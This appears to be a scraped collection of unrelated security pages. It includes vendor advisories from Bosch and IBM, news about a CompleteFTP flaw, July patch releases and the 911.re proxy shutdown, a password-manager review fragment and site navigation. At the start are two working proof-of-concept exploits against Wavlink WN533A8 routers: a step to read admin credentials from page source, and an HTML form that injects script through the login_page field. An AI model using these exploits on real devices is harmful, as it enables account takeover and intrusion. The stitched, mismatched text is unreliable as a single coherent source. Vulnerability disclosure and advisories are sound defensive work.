Wavlink WN533A8 suffers from a password disclosure vulnerability.

Change Mirror Download

    # Exploit Title: Wavlink WN533A8 - Password Disclosure# Date: 2022-06-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M33A8.V5030.190716# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34046# Tested on: Windows# Exploitview-source:http://IP_ADDRESS/sysinit.shtmlsearch for var syspasswd="you will find the username and the password

Wavlink WN533A8 Password Disclosure

Wavlink WN533A8 suffers from a cross site scripting vulnerability.

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M33A8.V5030.190716# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34048# Tested on: Windows# Poc code<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">      <input type="hidden" name="newUI" value="1" />      <input type="hidden" name="page" value="login" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="langChange" value="0" />     <input type="hidden" name="ipaddr" value="196.219.234.10" />      <input type="hidden" name="login_page" value="x");alert(9);x=("" />      <input type="hidden" name="homepage" value="main.shtml" />      <input type="hidden" name="sysinitpage" value="sysinit.shtml" />      <input type="hidden" name="wizardpage" value="wiz.shtml" />      <input type="hidden" name="hostname" value="59.148.80.138" />      <input type="hidden" name="key" value="M94947765" />      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />      <input type="hidden" name="lang_select" value="en" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Wavlink WN533A8 Cross Site Scripting

File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.

**Advisory Information**

*   **Advisory ID:** BOSCH-SA-013924-BT
*   **CVE Numbers and CVSS v3.1 Scores:**
    *   CVE-2022-36301
        *   Base Score: 9.8 (Critical)
    *   CVE-2022-36302
        *   Base Score: 8.8 (High)
*   **Published:** 01 Aug 2022
*   **Last Updated:** 01 Aug 2022

**Summary**

Multiple vulnerabilities were identified in BF-OS version 3.x up to and including 3.83 used by Bigfish V3 and PR21 (Energy Platform) devices and Bigfish VM image, which are part of the data collection infrastructure of the Energy Platform solution.

The most critical vulnerability may allow an unauthenticated remote attacker to gain administrative privileges to the device by brute-forcing a weak password. The second vulnerability may allow a remote authenticated attacker to gain unauthorized read access to local operating system files outside the web server root.

Both vulnerabilities are closed with BF-OS version 3.84, which Bosch will install remotely to affected customers after agreeing on a suitable maintenance window. Affected customers do not have to take further action.

The vulnerabilities were identified in an internal penetration test. Bosch is currently not aware of exploitation of these vulnerabilities in the wild.

**Affected Products**

*   Bosch BF-OS 3.0 <= 3.83 on: Bigfish V3 (Linux)
*   Bosch BF-OS 3.0 <= 3.83 on: PR21 (Linux)
*   Bosch BF-OS 3.0 <= 3.83 on: VM (Windows)

**Solution and Mitigations****Software Update**

Update to BF-OS version 3.84 or greater to close these vulnerabilities.

Bosch will contact all affected customers individually and push this new version to affected devices after having agreed on a customer-specific maintenance window. The installation takes approximately half an hour and during this time measurement data cannot be captured.

The update results in the following changes to the affected devices:

*   The devices will enforce a sufficiently long and complex password to protect against unauthorized access.
    
*   Each customer will receive a list of new initial passwords for his devices.
    
*   Connecting to a device from the Energy Platform software requires entering the device password.
    

Customers can verify that the update has been installed successfully by verifying the version in the device overview of the Energy Platform software.

**Vulnerability Details****CVE-2022-36301**

CVE description: BF-OS version 3.x up to and including 3.83 do not enforce strong passwords which may allow a remote attacker to brute-force the device password.

*   Problem Type:
    *   CWE-521 Weak Password Requirements
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    *   Base Score: 9.8 (Critical)

**CVE-2022-36302**

CVE description: File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.

*   Problem Type:
    *   CWE-641 Improper Restriction of Names for Files and Other Resources
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    *   Base Score: 8.8 (High)

**Remarks****Security Update Information**

With respect to Directive (EU) 2019/770 and Directive (EU) 2019/771 and their national transposition laws, please note:

It is your responsibility to download and/or install any security updates provided by us, for example to maintain product or data security. If you fail to install a security update provided to you within a reasonable period of time, we will not be liable for any product defect solely due to the absence of such security update.

Alternatively, we are entitled to directly download and/or install security updates regardless of your settings. In these cases, we will provide you with the relevant information, e.g. in this security advisory.

**CVSS Scoring**

Vulnerability classification has been performed using the CVSS v3.1 scoring system . The CVSS environmental score is specific to each customer’s environment and should be defined by the customer to attain a final scoring.

**Additional Resources**

Please contact the Bosch PSIRT if you have feedback, comments, or additional information about this vulnerability at: psirt@bosch.com .

**Revision History**

*   01 Aug 2022: Initial Publication

CVE-2022-36302: Multiple Vulnerabilities in BF-OS

Security issue fixed in version 22.1.1 of file transfer software

James Walker 01 August 2022 at 13:14 UTC

Security issue fixed in version 22.1.1 of file transfer software

A security vulnerability in file transfer software CompleteFTP allowed unauthenticated attackers to delete arbitrary files on affected installations.

Developed by EnterpriseDT of Australia, CompleteFTP is a proprietary FTP and SFTP server for Windows that supports FTPS, SFTP, and HTTPS.

A security researcher with the handle rgod discovered a flaw in the class that results from the lack of proper validation of a user-supplied path prior to using it in file operations.

Read more of the latest enterprise security news

“This vulnerability allows remote attackers to delete arbitrary files on affected installations of EnterpriseDT CompleteFTP server,” a security advisory explains.

“An attacker can leverage this vulnerability to delete files in the context of SYSTEM.”

The issue was assigned CVE-2022-2560 and was fixed in CompleteFTP version 22.1.1.

This release includes other security enhancements in the form of SHA-2 cryptographic hash function for RSA signatures and a new format for PuTTY private keys.

_The Daily Swig_ has approached EnterpriseDT for comment.

**YOU MIGHT ALSO LIKE** GitHub Actions workflow flaws provided write access to projects including Logstash

CompleteFTP path traversal flaw allowed attackers to delete server files

Keep your logins locked down with our favorite apps for PC, Mac, Android, iPhone, and web browsers.

Bitwarden offers a paid upgrade account. The cheapest of the bunch, Bitwarden Premium, is $10 per year. That gets you 1 GB of encrypted file storage, two-factor authentication with devices like YubiKey, FIDO U2F, Duo, and a password hygiene and vault health report. Paying also gets you priority customer support.

_After signing up,_ _download the app_ _for Windows, MacOS, Android, iOS, or Linux. There are also browser extensions for_ _Firefox, Chrome, Safari, Edge, Vivaldi, and Brave__._

Best Full-Featured Manager

Courtesy of Dashlane

I first encountered Dashlane several years ago. Back then, it was the same as its competitors with no standout attributes. But recent updates have added several helpful features. One of the best is Site Breach Alerts, something other services have since added as well. Dashlane actively monitors the darker corners of the web, looking for leaked or stolen personal data, and then alerts you if your information has been compromised.

Setup and migration from another password manager is simple, and you’ll use a secret key to encrypt your passwords, much like 1Password’s setup process. In practice, Dashlane is very similar to the others in this list. The company did discontinue its desktop app earlier this year, moving to a web-based user interface, which is a little different than 1Password and Bitwarden. (The desktop apps officially shut down on January 10, 2022.) I primarily use passwords in the web browser anyway, and Dashlane has add-ons for all the major browsers, along with iOS and Android apps. If a desktop app is important to you, it’s something to be aware of. Dashlane offers a 30-day free trial, so you can test it out before committing.

_After signing up,_ _download the app_ _for Android and iOS, and grab the browser extensions for_ _Firefox, Chrome, and Edge__._

Best DIY Option (Self-Hosted)

Courtesy of KeePassXC

Want to retain more control over your data in the cloud? Try using a desktop application like KeePassXC. It stores encrypted versions of all your passwords into an encrypted digital vault that keeps you secure with a master password, a key file, or both. The difference is that instead of a hosted service like 1Password syncing it for you, you sync that database file yourself using a file-syncing service like Dropbox or Edward Snowden’s recommended service, SpiderOak. Once your file is in the cloud, you can access it on any device that has a KeePassXC client.

Why do it yourself? In a word: transparency. Like Bitwarden, KeepassXC is open source, which means its code can be and has been inspected for critical flaws.

_Download the_ _desktop app_ _for Windows, MacOS, or Linux and create your vault. There are also extensions for_ _Firefox__,_ _Edge__, and_ _Chrome__. It does not have official apps for your phone. Instead, the project recommends_ _KeePass2Android_ _or_ _Strongbox for iPhone__._

Another Option

Courtesy of NordPass

NordPass is a relatively new kid on the password manager block, but it comes from a company with significant pedigree. NordVPN is a well-known VPN provider, and the company brings to its password manager much of the ease of use and simplicity that made its VPN offering popular. The installation and setup process is a breeze. There are apps for every major platform (including Linux), browser, and device.

The free version of NordPass is limited to one device, and there’s no syncing available. There is a seven-day free trial of the premium version, which lets you test device syncing. But to get that for good, you’ll have to upgrade to the $36-a-year plan. (Like its VPN service, NordPass accepts payment in cryptocurrencies.)

You Need a Password Manager. Here Are the Best Ones

IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2 could allow a user to access information from a tenant of which they should not have access. IBM X-Force ID: 219391.

  

**Summary**

Security Bulletin: IBM Robotic Process Automation is vulnerable to an information disclosure (CVE-2022-22334)

**Vulnerability Details**

**CVEID:**   CVE-2022-22334  
**DESCRIPTION:**   IBM Robotic Process Automation could allow a user to access information from a tenant of which they should not have access.  
CVSS Base score: 4.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/219391 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Robotic Process Automation as a Service

All

IBM Robotic Process Automation

< 21.0.2.5

IBM Robotic Process Automation

< 21.0.1.7

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s)  
**

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

21.0.2

Download and install 21.0.2.5 (21.0.2 IF005)

IBM Robotic Process Automation

21.0.1

Download and install 21.0.1.7 (21.0.1 IF007)

IBM Robotic Process Automation as a Service

All

No action required as IBM Robotic Process Automation as a Service servers have been updated to 21.0.2 IF005 or higher.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

Mariana Penna (IBM)

**Change History**

12 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22334: Security Bulletin: IBM Robotic Process Automation is vulnerable to an information disclosure (CVE-2022-22334)

IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2 contains a vulnerability that could allow IBM tenant credentials to be exposed. IBM X-Force ID: 227288.

  

**Summary**

Security Bulletin: IBM Robotic Process Automation is vulnerable to exposure of tenant credentials (CVE-2022-22505)

**Vulnerability Details**

**CVEID:**   CVE-2022-22505  
**DESCRIPTION:**   IBM Robotic Process Automation contains a vulnerability that could allow IBM tenant credentials to be exposed.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/227288 for the current score.  
CVSS Vector: (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

< 21.0.3

IBM Robotic Process Automation for Cloud Pak

< 21.0.3

IBM Robotic Process Automation as a Service

All

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s)  
**

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

< 21.0.3

Download and install 21.0.3

IBM Robotic Process Auotmation for Cloud Pak

< 21.0.3

Download and Install 21.0.3

IBM Robotic Process Automation as a Service

All

No action required as IBM Robotic Process Automation as a Service servers have been updated to 21.0.3 or higher.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

18 Jun 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22505: Security Bulletin: IBM Robotic Process Automation is vulnerable to exposure of tenant credentials (CVE-2022-22505)

Categories: A week in security
Tags: backdoor

Tags: blog recap

Tags: bytedance

Tags: cookies

Tags: data breach

Tags: Google

Tags: linux

Tags: microsoft

Tags: ransomware

Tags: SQL injection

Tags: T-Mobile

Tags: tiktok

Tags: Uber

Tags: week in security

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (July 25 - July 31) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (July 25 - July 31)

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

July has been a month of important updates, including patches for already-exploited vulnerabilities in Microsoft and Google products. This month also saw the first Apple iOS update in eight weeks, fixing dozens of security flaws in iPhones and iPads.

Security vulnerabilities continue to hit enterprise products, too, with July patches issued for SAP, Cisco, and Oracle software. Here’s what you need to know about the vulnerabilities fixed in July.

Apple iOS 15.6

Apple has released iOS and iPadOS 15.6 to fix 37 security flaws, including an issue in Apple File System (APFS) tracked as CVE-2022-32832. If exploited, the vulnerability could allow an app to execute code with kernel privileges, according to Apple’s support page, giving it deep access to your device.

Other iOS 15.6 patches fix vulnerabilities in the kernel and WebKit browser engine, as well as flaws in IOMobileFrameBuffer, Audio, iCloud Photo Library, ImageIO, Apple Neural Engine, and GPU Drivers.

Apple isn’t aware of any of the patched flaws being used in attacks, but some of the vulnerabilities are pretty serious—especially those affecting the kernel at the heart of the operating system. It’s also possible for vulnerabilities to be chained together in attacks, so make sure you update as soon as possible.

The iOS 15.6 patches were released alongside watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, macOS Big Sur 11.6.8, and macOS Catalina 10.15.7 2022-005.

Google Chrome

Google released an emergency patch for its Chrome browser in July, fixing four issues, including a zero-day flaw that has already been exploited. Tracked as CVE-2022-2294 and reported by Avast Threat Intelligence researchers, the memory corruption vulnerability in WebRTC was abused to achieve shellcode execution in Chrome’s renderer process.

The flaw was used in targeted attacks against Avast users in the Middle East, including journalists in Lebanon, to deliver spyware called DevilsTongue.

Based on the malware and tactics used to carry out the attack, Avast attributes the use of the Chrome zero-day to Candiru, an Israel-based company that sells spyware to governments.

Microsoft’s Patch Tuesday

Microsoft’s July Patch Tuesday is a big one, fixing 84 security issues including a flaw already being used in real-world attacks. The vulnerability, CVE-2022-22047, is a local privilege escalation flaw in the Windows Client/Server Runtime Subsystem (CSRSS) server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. An attacker able to successfully exploit the vulnerability could gain System privileges, according to Microsoft.

Of the 84 issues patched in Microsoft’s July Patch Tuesday, 52 were privilege escalation flaws, four were security feature bypass vulnerabilities, and 12 were remote code execution issues.

Microsoft security patches do sometimes cause other issues, and the July update was no different: Following the release, some users found MS Access runtime applications did not open. Thankfully, the firm is rolling out a fix.

Android July Security Bulletin

Google has released July updates for its Android operating system, including a fix for a critical security vulnerability in the System component that could lead to remote code execution with no additional privileges needed.

Google also fixed serious issues in the kernel–which could result in information disclosure—and the framework, which could lead to local privilege escalation. Meanwhile, vendor-specific patches from MediaTek, Qualcomm, and Unisoc are available if your device is using those chips. Samsung devices are starting to receive the July patch, and Google also released updates for its Pixel range.

SAP

Software maker SAP has issued 27 new and updated security notes as part of its July Security Patch Day, fixing multiple high-severity vulnerabilities. Tracked as CVE-2022-35228, the most serious issue is an information disclosure flaw in the central management console of the vendor’s Business Objects platform.

The vulnerability allows an unauthenticated attacker to gain token information over the network, according to security firm Onapsis. “Fortunately, an attack like this would require a legitimate user to access the application,” the firm adds. However, it’s still important to patch as soon as possible.

Oracle

Oracle has issued 349 patches in its July 2022 Critical Patch Update, including fixes for 230 flaws that can be exploited remotely.

Oracle’s April Patch Update included 520 security fixes, some of which addressed CVE-2022-22965, aka Spring4Shell, a remote code execution flaw in the spring framework. Oracle’s July update continues to address this issue.

Apple Just Patched 37 iPhone Security Bugs

By Waqas
At the time of writing, the home page of 911 (911.re) Proxy Service was displaying a detailed message…
This is a post from HackRead.com Read the original post: 911 (911.re) Proxy Service Shuts Down After Confirming Security Breach

****At the time of writing, the home page of 911 (911.re) Proxy Service was displaying a detailed message left by the website’s administrator revealing details of the security breach.****

911 proxy service (911.re), regarded as one of the few original residential **proxy networks**, has announced shutting down its operations after suffering a data breach. The service that has sold access to countless Microsoft Windows computers since 2015 confirmed in a message on its home page that the **cyberattack** destroyed critical elements of its business operations.

**Incident Details**

Earlier in July 2022, Brian Krebs from KrebsOnSecurity had **criticized** the connections 911.re proxy service had with dubious pay-per-install affiliate programs, which bundled its software with pirated software and free utilities.

Krebs noted that 911.re operated multiple pay-per-install programs and paid affiliates to bundle its software with other programs to generate a steady stream of proxies. 

Soon after Krebs’ report, 911.re informed users about reviewing its network and implementing new security measures to “prevent misuse” of its services, along with closing new user registrations and proxy balance top-up.

“We are reviewing every existing user, to ensure their usage is legit and compliance with our Terms of Service,” the notice read.

Many users complained that they could not use the service after the company’s public notice. On July 28th, the website announced a permanent shutdown of its services.

“We regret to inform you that we permanently shut down 911.re and all its services on July 28th.”

The home page of 911.re proxy service at the time of writing this article (Image: Hackread.com)

**Was 911.re Hacked?**

As shown in the screenshot above, 911.re claims that its service was hacked in July 2022 after someone manipulated the balances of many user accounts by abusing an API (application programming interface) that handled account top-ups.

The company investigated and discovered that the hacker “maliciously damaged” its server data. The hackers managed to overwrite its servers, data, and its backups. Since the company wasn’t sure how it compromised this system, it decided to shut down the recharge system and new user registration “urgently.”

**How do Residential Proxy Services Work?**

Users rent a residential IP address and use it as a relay for internet communications while securing their identity. But they are generally unaware that it would turn their device into a proxy that allows other users to use their internet address.

Such proxy services build their networks by offering free proxy or free VPN services powered by software that turns their computers into a traffic relay.

1.  **ProxyBack Malware Converts Your PC Into Proxy**
2.  **Tor Proxy Used By Cybercriminals To Initiate Bitcoin Theft**
3.  **What Are Dark Web Search Engines and How to Find Them?**
4.  **Mirai Variant ‘OMG’ Turns IoT Devices into Proxy Servers for Cryptomining**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#windows